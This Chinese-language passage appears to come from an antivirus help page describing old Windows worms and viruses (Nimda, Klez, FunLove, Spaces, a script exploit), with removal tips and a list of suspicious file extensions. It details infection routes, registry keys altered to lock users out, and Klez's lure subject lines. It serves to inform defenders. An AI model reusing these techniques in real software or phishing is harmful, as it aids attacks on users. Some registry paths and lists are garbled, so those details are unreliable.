6、创建线程3,发送EMAIL。
创建线程4,感染网络所有共享文件,每8小时搜索一次。
创建线程5,搜索磁盘文件。
创建线程6,检查当前日期是否为奇数月的13号,如是,将所有文件复制一次,线程5小时运行一次,永不退出。
六、W32.Nimda.eml
感染途径:
该病毒是一种传染途径很多的病毒,并且尝试利用多种已知系统漏洞,于第一版相似,它通过以下途径感染
l 电子邮件(附件)
l 局域网共享驱动器
l 利用没有安装Service Pack的IIS(Internet Information Server)
l 通过文件感染
利用了如下的系统漏洞:
l MIME漏洞,可以在没有得到用户许可的情况下自动执行附件
l IIS漏洞,使之可以被上载恶意代码与前版本的不同:
Win32.Nimda.E是Nimda.A的新变种,它修改了以前版本的一些错误,并且加入了对付多种对抗反病毒软件的设计,它与第一版的主要区别有:
l 附件名改名为Sample.exe
l 复制本身到系统目录下的名称改为Csrss.exe(原来为mmc.exe)
l 释放出的动态库名称变更为Httpodbc.dll
建议用户做如下系统升级,以便防患于未然:
升级到Internet Explorer 5.01 SP2 或
升级到Internet Explorer 5.5 SP2 或
升级到Internet Explorer 6.0
下载并安装升级包,NT4用户使用NT4 Service Pack 6a,Windows 2000用户使用 Windows 2000 Service Pack 2,并且到微软公司的主页(或用Windows Update)下载安全补丁。
注意磁盘共享的权限、口令设置,不要让所有用户对硬盘驱动器都可以读写不要打开来历不明的邮件附件,尤其是可执行文件。
七、W32.Klez.eml
新的Klez变种在以前的基础上增加了更多的工作线程,并且在驻留系统后可能会结束其它进程并且删除相应文件,所以有较大的破坏,提请用户注意!
蠕虫的流程:
1.蠕虫使用AdjustTokenPrivileges调整自己的特权,
2.拷贝自己的一个副本到系统目录下,名为win****.exe.
3.修改注册表,向SCM数据库中添加新的服务。
4.复制自己并运行,然后删除。
5.调用StartServiceCtrlDispatcher函数。
6.服务创建下面的线程。
7.结束。
第一个线程:
写注册表
遍历系统进程,结束正在运行的进程并删除进程的磁盘文件。
第二个线程:
发email.
第三个线程:
遍历本地网络。
第四个线程:
注册表操作
第六个线程:
搜索特定目录
第七个线程:
搜本地磁盘。
第八个线程:
搜索磁盘文。
第五个线程:
复制自己,运行后删除。
信件主题可能为以下内容:
Hi,
Hello,
Re:
Fw:
Undeliverable mail--"..."
Return
how are you
Let's be friends
Darling
Don't drink too much
your password
Honey
Some questions
Please try again
welcome to my hometown
The Garden of Eden
Introduction on ADSL
Meeting notice
questionnaire
Congratulations
Sos!
Japanese girl VS playboy
Look,my beautiful girl friend
Eager to see you
spice girls' vocal concert
Japanese lass' sexy pictures
信件携带的附件虚假扩展名可能为以下之一:
txt htm html wab doc xls jpg cpp c pas mpg mpeg bak mp3
真实扩展名为EXE SCR PIF BAT之一。
病毒体内有以下加密信息:
Win32 Klez V2.0 Win32 Elkern V1.1,(There nick name is Twin Virus*^__^*)
Copyright,made in Asia,announcement:
1.I will try my best to protect the user from some vicious virus,Funlove,Sircam,Nimda,CodeRed and even include 32.Klez1.X
2.Pitiful AVers,can't Elkern 1.0 1.1 work on Win 2KXP?Plz clear your eyes.
3.Well paid jobs are wanted
4.Poor life should be unblessed
5.Don't accuse me.Please accuse the unfair shit world
解决方法,本病毒无法手工杀毒,只能升级杀毒软件。并且由于会结束进程,所以建议用户在DOS下用杀毒软件清除。
八、Script.Exploit
1.此病毒利用脚本的SCAPE功能将自身加密,以达到隐藏自己的目的.
2.此病毒利用”万花谷病毒”的技术来破坏系统的正常使用.
3.将IE的首页通过系统注册表项
HKEY_LOCAL_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",设置成为:” [url][/url]”
4.为了达到破坏性,该病毒对系统的注册表做了如下的修改:
1.通过系统注册表项HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun的修改使系统没有”运行”菜单。
2.通过系统注册表项HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose的修改使系统没有” 关闭系统”项目.
3.通过系统注册表项HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff的修改使系统没有”注销”项目.
4.通过系统注册表项HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives的修改使系统没有所有的逻辑驱动器.
5.通过系统注册表项HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools的修改使系统不能使用注册表的编辑工具REGEDIT.
6.通过系统注册表项HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop的修改使系统没有桌面.
7.通过系统注册表项HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled的修改使系统禁止运行所有的DOS应用程序.
8.通过系统注册表项HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled的修改使系统不能启动到"实模式(传统的DOS模式)"下.
9.通过系统注册表项"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption的修改使系统登录时显示一个登录窗口,此窗口的标题为:” HUNK提醒您中了※混客绝情炸弹※QQ:5604160”.
10.通过系统注册表项HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText的修改使系统登录时显示一个登录窗口,此窗口内的文字为:” HUNK提醒您中了※混客绝情炸弹※QQ:5604160”.
11.通过系统注册表项HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title的修改使系统在打开所有的IE窗口时, 窗口的标题为:” HUNK提醒您中了※混客绝情炸弹※QQ:5604160”.
九、W32.FunLove.gen
这是WIN32类型的病毒,它可以感染Windows 9x 和Windows NT 4.0操作系统。它感染所有WIN32类型的文件(PE文件),如Windows 和 Program Files 目录及其子目录中的扩展名为.EXE, .SCR, and .OCX 的文件。该病毒搜索所有具有写访问的网络共享文件夹并感染那里的所有的文件。该病毒同时能够修补NT环境的完整性检测,以便能够感染系统文件。
病毒中有'~Fun Loving Criminal~'字样。 该病毒没有故意的破坏性,但是由于NT系统安全性很差而可能造成的破坏还是应当引起注意的。
同一个简单的添加一样,Win32/Funlove.4099将它的代码复制到宿主文件的最后一个扇区的结尾,然后,它修改PE文件头信息以显示新的扇区大小,使扇区的特征适应病毒的需要,同时病毒修改原文件入口点的程序代码以便执行病毒代码。
当一个染毒程序被运行,病毒代码程序获得系统控制权,Win32/Funlove.4099 病毒在系统目录下创建FLCSS.EXE文件,并从染毒宿主文件的最后提取出病毒代码,将其写入该文件中,然后FLCSS.EXE被执行。
如果是在NT的许可权限下运行,FLCSS.EXE会将自身像一个服务程序一样安装到NT机器上。它会以"FLC"显示在标准的NT服务列表中,并且被设置为在每次启动时自动运行此服务。在Windows 9X下,它像一个隐含程序一样运行,在任务列表中是不可见的。
在病毒程序第一次运行时,该病毒会按照一定的时间间隔,周期性地检测每一个驱动器上的EXE,SCR(屏保程序)和OCX(ActiveX control)文件,找到相应的文件就感染它们。它还搜索在网络上可使用的共享资源,并感染任何有访问权限的同一类型的文件。因此,它可以在机器间完全开放权限的共享文件上非常快地传播。该病毒检测以下文件名且不感染它们:ALER*, AMON*, _AVP*, AVP3*, AVPM*, F-PR*, NAVW*, SCAN*, SMSS*, DDHE*, DPLA*, MPLA*。
尽管该病毒对数据没有直接的破坏性,但是在NT下,Win32/Funlove.4099 病毒还是对NTOSKRNL.EXE 文件做了一个小的修改(patch),使得文件的许可请求总是返回允许访问(access allowed),这意味着被感染机器的安全已受到了极大地威胁。只要是在被修改的机器上,所有的用户都拥有了对每一个文件的完全控制访问权,即使是在系统中可能拥有最低权限的GUEST,也能读取或修改所有文件,包括通常只有管理员才能访问的文件。在NT启动时,NTLDR将检测NTOSKRNL.EXE 的完整性,所以病毒也修改NTLDR,因此NTLDR将允许系统加载修改后的NTOSKRNL文件。这种修改只能在某些NT服务包(service packs)中起作用,但是不管当前机器的SP级别病毒都会申请修改程序。在感染FLC病毒的NT机器上清除病毒后,需要用备份文件对这些被修改的文件进行恢复,或者重新安装这些文件。
如果FLCSS.EXE 运行在DOS下,病毒将显示'~Fun Loving Criminal~'字串,然后它试图通过键盘控制器重新启动系统。这大概是希望Windows被加载且病毒可能有另一个机会去执行。这种尝试经常失败,而计算机则被锁。
十、W95.Spaces.gen
这是一个危险的常驻内存寄生病毒。它只在WIN95/98下进行复制,而且会感染WIN32可执行文件。当一个受染文件运行的时候,病毒会自我安装到WINDOWS内存中。在感染的时候,病毒会增加文件最后区的空间病把自己写到这里。
在七月一日,病毒会破坏硬盘的MBR区病毒终止机器的运行。它会删除MBR载入程序的代码并修改磁盘的分区表格,这样只有一个区间被列出,然后指到MBR区。这种方式的破坏很危险:在DOS装载的时候会被终止。虽然磁盘上的数据没有被破坏,但是这个磁盘区不能被再次访问了。病毒能绕过BIOS防病毒保护程序把自己直接写到硬盘控制器的端口,这样就破坏了MBR区间。由于病毒程序存在缺陷,因此会产生"General Protection Fault"出错信息,这样MBR就会免于受到破坏。
注意:如果在一个文件的最后部分发现字符串ERL,这就能证明此病毒已经感染了这个文件。
怎样辨别木马
你好!
你可从文件的后缀名中进行判断,一般木马病毒后缀名有:
ad[ep] .asd .ba[st] .c[ho]m .cmd .cpl .crt .dbx .dll .exe .hlp .hta .in[fs] .isp .js .jse .lnk .md[etw] .ms[cipt] .nws .ocx .ops .pcd .pi .prf .reg .scf .scr .sct .sh[bms] .uue .vb .vb[esx] .vxd .wab .ws[cfh] .cmd .bat .com .exe .scr .cpl .rtf .wab .cpp .pas .mp8 .bak .mpg .tmp .wab .dbx .tbb .sht .mbx .eml .pmr .fpt .inb .adb .asp .cfg .cgi .dbx .dhtm .eml .jsp .mbx .mdx .mht .mmf .msg .nch .ods .oft .php .pl .sht .shtm .stm .tbb .txt .uin .uin .wab .wsh .vbs等等。。。。
如电脑出现上述扩展名,建议你用腾讯电脑管家进行一次全盘查杀,查杀步骤:
下载安装腾讯电脑管家后,打开腾讯电脑管家上的【杀毒】,选择【全盘查杀】,如图:
腾讯电脑管家企业平台: